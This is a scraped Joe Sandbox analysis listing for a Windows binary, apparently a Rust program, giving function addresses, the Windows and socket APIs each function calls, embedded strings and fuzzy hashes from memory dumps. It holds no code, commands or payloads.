Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID: memcpy
String ID: assertion failed: match track_edge_idx { LeftOrRight::Left(idx) => idx <= old_left_len, LeftOrRight::Right(idx) => idx <= right_len,}$assertion failed: new_left_len <= CAPACITY$assertion failed: old_left_len + count <= CAPACITY
API String ID: 3510742995-3535459961
Opcode ID: 70168d065c6a3ca59545dac05477e4dd7e94a6eca155fb99468ba8c209af9471
Instruction ID: 91bb85847d17f6fd785a4bfcf36b162b0f925004b95150e71552a807bd0c79f5
Opcode Fuzzy Hash: 70168d065c6a3ca59545dac05477e4dd7e94a6eca155fb99468ba8c209af9471
Instruction Fuzzy Hash: 13817C32A08BD989E7258F68E9403E933B4FB58788F508221DF8C47769EF799695D300

Function 00007FF63D27F3A5 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 125COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 00007FF63D27F3AF
CloseHandle.KERNEL32 ref: 00007FF63D27F3C4
CloseHandle.KERNEL32 ref: 00007FF63D27F923

Strings

0123456789ABCDEFxxxxxxxx-xxxx-4xxx-yxxx-xxxxxxxxxxxxUnexpected format character, xrefs: 00007FF63D27F941
program path has no file name, xrefs: 00007FF63D27F990

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID: CloseHandle
String ID: program path has no file name$0123456789ABCDEFxxxxxxxx-xxxx-4xxx-yxxx-xxxxxxxxxxxxUnexpected format character
API String ID: 2962429428-4245703473
Opcode ID: e4ed8d0c59601023ecf3ebc2ed2f1d44bedde78b38ba1afae8e28cebf9c8ba44
Instruction ID: dc22c24e73566604bc45a36519b737357f95aff3e2617f8bdc73589905790311
Opcode Fuzzy Hash: e4ed8d0c59601023ecf3ebc2ed2f1d44bedde78b38ba1afae8e28cebf9c8ba44
Instruction Fuzzy Hash: 74416262E0CA8995EF709AA2DA047FA2350FF85B98F404036DF1DD7796EE3CE541A300

Function 00007FF63D277830 Relevance: 7.6, APIs: 5, Instructions: 93networkCOMMON

Download Yara Rule

APIs

WSAGetLastError.WS2_32 ref: 00007FF63D27789F
connect.WS2_32 ref: 00007FF63D2778FB
WSAGetLastError.WS2_32 ref: 00007FF63D27790A
ioctlsocket.WS2_32 ref: 00007FF63D27793A

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID: ErrorLast$connectioctlsocket
String ID:
API String ID: 1971785428-0
Opcode ID: 0db338ea5928d33d7f0d60137e2a4ec9b44759f720c3e057481c14978456a539
Instruction ID: a34b2a10dc099f3626efc87437256b471c54adfdca1d4a3595b067f67131a329
Opcode Fuzzy Hash: 0db338ea5928d33d7f0d60137e2a4ec9b44759f720c3e057481c14978456a539
Instruction Fuzzy Hash: A931E222E18AD995F3308AB1DA417F926A0EB44788F115132DF1C873C5FF38EA95E350

Function 00007FF63D27FB8B Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32 ref: 00007FF63D27FB8D
GetLastError.KERNEL32 ref: 00007FF63D27FBA5
GetCurrentProcess.KERNEL32 ref: 00007FF63D27FD43
DuplicateHandle.KERNEL32 ref: 00007FF63D27FD6D
GetLastError.KERNEL32 ref: 00007FF63D27FD7C

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID: ErrorHandleLast$CurrentDuplicateProcess
String ID:
API String ID: 3697983210-0
Opcode ID: e16d268964d62feb434ca1289034d1693678657d648a729bbab490d3768ff12e
Instruction ID: 23174f06faab6b63d7c41b9d29420f8020a30e1c1363e09935a2cf0051bd176a
Opcode Fuzzy Hash: e16d268964d62feb434ca1289034d1693678657d648a729bbab490d3768ff12e
Instruction Fuzzy Hash: A8115232E0C21A45FB30DAE0A1053B96590AB487B8F140235EF6C97BC6EF7DD881B751

Function 00007FF63D2CD980 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 240memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(00007FF63D3FA1B0,00007FF63D3FA1B8,00000001,?,?,?,?,?,00007FF63D221224,?,?,?,00007FF63D2213E6), ref: 00007FF63D2CDB5D

Strings

%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p., xrefs: 00007FF63D2CDCCA
Unknown pseudo relocation bit size %d., xrefs: 00007FF63D2CDCB4
Unknown pseudo relocation protocol version %d., xrefs: 00007FF63D2CDCD6

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID: ProtectVirtual
String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p.
API String ID: 544645111-1286557213
Opcode ID: 96b70dcdced3092a79e7ce9b1dbf8396ced5d4e9346ba3b35ff7dc70d908fabe
Instruction ID: 0744541339b066f1c20495a01cbe229f86b056add938b7afacc8f2784805fbf6
Opcode Fuzzy Hash: 96b70dcdced3092a79e7ce9b1dbf8396ced5d4e9346ba3b35ff7dc70d908fabe
Instruction Fuzzy Hash: E391C432F4D51E86FB209BA09A4037962A1BF95764F148631DB2D977D8FE3CEC42B210

Function 00007FF63D27F837 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 104COMMON

Download Yara Rule

APIs

FreeEnvironmentStringsW.KERNEL32 ref: 00007FF63D27F87C
CloseHandle.KERNEL32 ref: 00007FF63D27F923

Strings

0123456789ABCDEFxxxxxxxx-xxxx-4xxx-yxxx-xxxxxxxxxxxxUnexpected format character, xrefs: 00007FF63D27F941
program path has no file name, xrefs: 00007FF63D27F990

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID: CloseEnvironmentFreeHandleStrings
String ID: program path has no file name$0123456789ABCDEFxxxxxxxx-xxxx-4xxx-yxxx-xxxxxxxxxxxxUnexpected format character
API String ID: 2431795302-4245703473
Opcode ID: 339552d0491dd970e688072a4d3e833ad330e0bb19627bfc62c7994c053cb7c5
Instruction ID: 5a8c1445f75f6ca92bdaaf9fed7ed35953450727b7682182d7f45529211f79c3
Opcode Fuzzy Hash: 339552d0491dd970e688072a4d3e833ad330e0bb19627bfc62c7994c053cb7c5
Instruction Fuzzy Hash: F541A262F1868A91EB749AA6DA006FA5350FF85BC8F404436DF1DC7796EE3CE545E300

Function 00007FF63D27F86C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 92COMMON

Download Yara Rule

APIs

FreeEnvironmentStringsW.KERNEL32 ref: 00007FF63D27F87C
CloseHandle.KERNEL32 ref: 00007FF63D27F923

Strings

0123456789ABCDEFxxxxxxxx-xxxx-4xxx-yxxx-xxxxxxxxxxxxUnexpected format character, xrefs: 00007FF63D27F941
program path has no file name, xrefs: 00007FF63D27F990

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID: CloseEnvironmentFreeHandleStrings
String ID: program path has no file name$0123456789ABCDEFxxxxxxxx-xxxx-4xxx-yxxx-xxxxxxxxxxxxUnexpected format character
API String ID: 2431795302-4245703473
Opcode ID: 5892b2aeae5a605133dc5c31f380f1318e5ef878c0ed1329628f4a0257264dd3
Instruction ID: 9a72a06dacd9e046e0ae963769dd03a90fd404dd7283072d74b2cd3b722ad25b
Opcode Fuzzy Hash: 5892b2aeae5a605133dc5c31f380f1318e5ef878c0ed1329628f4a0257264dd3
Instruction Fuzzy Hash: A031A462E08A8995EB709BA6DA006FA6360FF85BC4F404032DF1DC7796EF38E541E340

Function 00007FF63D2CDD36 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

Strings

CCG , xrefs: 00007FF63D2CDD55

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID:
String ID: CCG
API String ID: 0-1584390748
Opcode ID: 7c3cbd8d043dbe7ee500ad9f982921b101fb08654013cfecdcbfb32fbcfe9d66
Instruction ID: 9221dd1851361eca817ed2a0ae4722a7263a42d1dc7ef88c37c27748c7302317
Opcode Fuzzy Hash: 7c3cbd8d043dbe7ee500ad9f982921b101fb08654013cfecdcbfb32fbcfe9d66
Instruction Fuzzy Hash: 7121A162E4D24E42FEA962F4865037911C29F89761F19897ACB1DC73D1FD2EECC1A212

Function 00007FF63D281620 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32 ref: 00007FF63D281634
GetLastError.KERNEL32 ref: 00007FF63D28164D
CloseHandle.KERNEL32 ref: 00007FF63D2816BD

Strings

SystemTime, xrefs: 00007FF63D2816DF

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID: CloseErrorHandleLastObjectSingleWait
String ID: SystemTime
API String ID: 2173817864-2656138
Opcode ID: ff0f429e8c35159ba724ebe3e140afce189a4b087dba9546ca4afad030b3a720
Instruction ID: 0921cfb7ab8078df652a3f2f41458f105719059e574ac245d4c29eb1f77a6d7e
Opcode Fuzzy Hash: ff0f429e8c35159ba724ebe3e140afce189a4b087dba9546ca4afad030b3a720
Instruction Fuzzy Hash: A4218D22F04B1998FB10ABA1E6413FD2760AB45798F544132EF5C53B99FF78D686D340

Function 00007FF63D294E50 Relevance: 6.6, APIs: 5, Instructions: 318COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF63D294F57
memcpy.MSVCRT ref: 00007FF63D294F6A
memcpy.MSVCRT ref: 00007FF63D2951A3
memcpy.MSVCRT ref: 00007FF63D2951B6
memcpy.MSVCRT ref: 00007FF63D29522E

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: f5f3afad7970c487c78c5129e85000cb707cf9b7110f291600492a86c6d4a556
Instruction ID: 96372dfbbfd733a71b46cf80d207badc04b9162e5b83376e92fe4c674b68b53b
Opcode Fuzzy Hash: f5f3afad7970c487c78c5129e85000cb707cf9b7110f291600492a86c6d4a556
Instruction Fuzzy Hash: 35F1BA62A04B9886F741DF68E9017ED63B4FB58788F449225EF8C53765EF38E6A5C300

Function 00007FF63D28011C Relevance: 6.3, APIs: 5, Instructions: 82COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 00007FF63D280258
CloseHandle.KERNEL32 ref: 00007FF63D280260
CloseHandle.KERNEL32 ref: 00007FF63D280268
CloseHandle.KERNEL32 ref: 00007FF63D280139

Part of subcall function 00007FF63D2CD100: RtlCaptureContext.KERNEL32 ref: 00007FF63D2CD192
Part of subcall function 00007FF63D2CD100: RtlUnwindEx.KERNEL32 ref: 00007FF63D2CD1CF
Part of subcall function 00007FF63D2CD100: abort.MSVCRT ref: 00007FF63D2CD1D5
Part of subcall function 00007FF63D2CD100: RaiseException.KERNEL32 ref: 00007FF63D2CD212

CloseHandle.KERNEL32 ref: 00007FF63D280283

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID: CloseHandle$CaptureContextExceptionRaiseUnwindabort
String ID:
API String ID: 2844319690-0
Opcode ID: 975a99299f8ffc9ecd3e1650fc6ac5b5f2ae9dc632a12cd14d0f2060783305b7
Instruction ID: b760ec46f5ffccb003ec6ea5133fa77feb2e188cba94d4dffd6a718f89fb55c7
Opcode Fuzzy Hash: 975a99299f8ffc9ecd3e1650fc6ac5b5f2ae9dc632a12cd14d0f2060783305b7
Instruction Fuzzy Hash: 4A414572A08B5589EB10EBA0E5513EC3BB0BB44B48F504435DF4C97B8AEFB8D698D340

Function 00007FF63D265700 Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 205COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF63D265753

Part of subcall function 00007FF63D280EF0: GetStdHandle.KERNEL32(-7FFFFFFFFFFFFF58,?,00001000,?,-7FFFFFFFFFFFFF58,?,00000000,00001FF0), ref: 00007FF63D280F1F
Part of subcall function 00007FF63D280EF0: GetLastError.KERNEL32(-7FFFFFFFFFFFFF58,?,00001000,?,-7FFFFFFFFFFFFF58,?,00000000,00001FF0), ref: 00007FF63D280F2F

memcpy.MSVCRT ref: 00007FF63D265850

Strings

assertion failed: filled <= self.buf.init, xrefs: 00007FF63D265AB8

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID: ErrorHandleLastmemcpymemset
String ID: assertion failed: filled <= self.buf.init
API String ID: 3211292799-906094691
Opcode ID: 9f2c9f5d79112fe39365158ab55285c7026b61322db35e62fa8adb01d7bd1f22
Instruction ID: a55f782f04e5152205b43cdc5369f09c211449510958e7fe7259b0c0396e0a62
Opcode Fuzzy Hash: 9f2c9f5d79112fe39365158ab55285c7026b61322db35e62fa8adb01d7bd1f22
Instruction Fuzzy Hash: E571C166B08B5989EB04CBA6DA801BD6762FB44BC8F584831DF1D97794EF7CE452E300

Function 00007FF63D265BB0 Relevance: 6.2, APIs: 4, Instructions: 160COMMON

Download Yara Rule

APIs

freeaddrinfo.WS2_32 ref: 00007FF63D265C0B
freeaddrinfo.WS2_32 ref: 00007FF63D265D87

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID: freeaddrinfo
String ID:
API String ID: 2731292433-0
Opcode ID: 16ed5cc825eb54a38bdbfcfb039228942f1d86979281abac1946a1295f4e2622
Instruction ID: b40db56a67529633eed40d2f055113154adf0d0d540c62187f6e323976dff4f3
Opcode Fuzzy Hash: 16ed5cc825eb54a38bdbfcfb039228942f1d86979281abac1946a1295f4e2622
Instruction Fuzzy Hash: 05716422A04B988AE754DFB4C5412AD77B0FB48B8CF148125EF4D93B89EF38D9A1D350

Function 00007FF63D27B300 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 142COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF63D27B35A
memcpy.MSVCRT ref: 00007FF63D27B436
CloseHandle.KERNEL32 ref: 00007FF63D27B4B4

Strings

0123456789ABCDEFxxxxxxxx-xxxx-4xxx-yxxx-xxxxxxxxxxxxUnexpected format character, xrefs: 00007FF63D27B301, 00007FF63D27B3E1

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID: memcpy$CloseHandle
String ID: 0123456789ABCDEFxxxxxxxx-xxxx-4xxx-yxxx-xxxxxxxxxxxxUnexpected format character
API String ID: 2153058950-2658723938
Opcode ID: 5ccdc7d7fc3b5eee296fd75cbb4314273ad49aacba613200f771a09f63a16e49
Instruction ID: cadd07fe246ecd7b1e540d7495c9be300ba11c5e79471937008688b0f83d4d22
Opcode Fuzzy Hash: 5ccdc7d7fc3b5eee296fd75cbb4314273ad49aacba613200f771a09f63a16e49
Instruction Fuzzy Hash: A4410822B04A5962FA269F529A503B85750FF49FD4F584130EF4D97B92EF3CE5A39300

Function 00007FF63D281C00 Relevance: 6.1, APIs: 4, Instructions: 76COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32 ref: 00007FF63D281CFA
GetFullPathNameW.KERNEL32 ref: 00007FF63D281D0F
GetLastError.KERNEL32 ref: 00007FF63D281D1A
GetLastError.KERNEL32 ref: 00007FF63D281D33
memcmp.MSVCRT ref: 00007FF63D281DB1

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID: ErrorLast$FullNamePathmemcmp
String ID:
API String ID: 2929619185-0
Opcode ID: 92a81ae790cde6e2ad8ab26dfe0cb6653e1814c53c6e8b7d79e8b7a2654fb407
Instruction ID: 362f9c0844e31148112adadb6bc38a90fd3dcab4bee7a9c6b9f09b392cfb90b6
Opcode Fuzzy Hash: 92a81ae790cde6e2ad8ab26dfe0cb6653e1814c53c6e8b7d79e8b7a2654fb407
Instruction Fuzzy Hash: 0631E422B04BC549E7729FA1D9447EA2694BB05BD8F500135EE5CDB7C5EF78E748A300

Function 00007FF63D26CD57 Relevance: 6.0, APIs: 4, Instructions: 42synchronizationCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 00007FF63D26CD83
WaitForSingleObject.KERNEL32 ref: 00007FF63D26CD94
GetLastError.KERNEL32 ref: 00007FF63D26CD9D
GetExitCodeProcess.KERNEL32 ref: 00007FF63D26CDC3

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID: CloseCodeErrorExitHandleLastObjectProcessSingleWait
String ID:
API String ID: 2321548817-0
Opcode ID: a0d15f8c4bdd69e92fd8cb4f2c7516a613d07cedd181c1df348f9317aa16673f
Instruction ID: bff5849de2e4877c3f61b1caf55a8d56e2fe62392e6ad498630bd8d0a17f264a
Opcode Fuzzy Hash: a0d15f8c4bdd69e92fd8cb4f2c7516a613d07cedd181c1df348f9317aa16673f
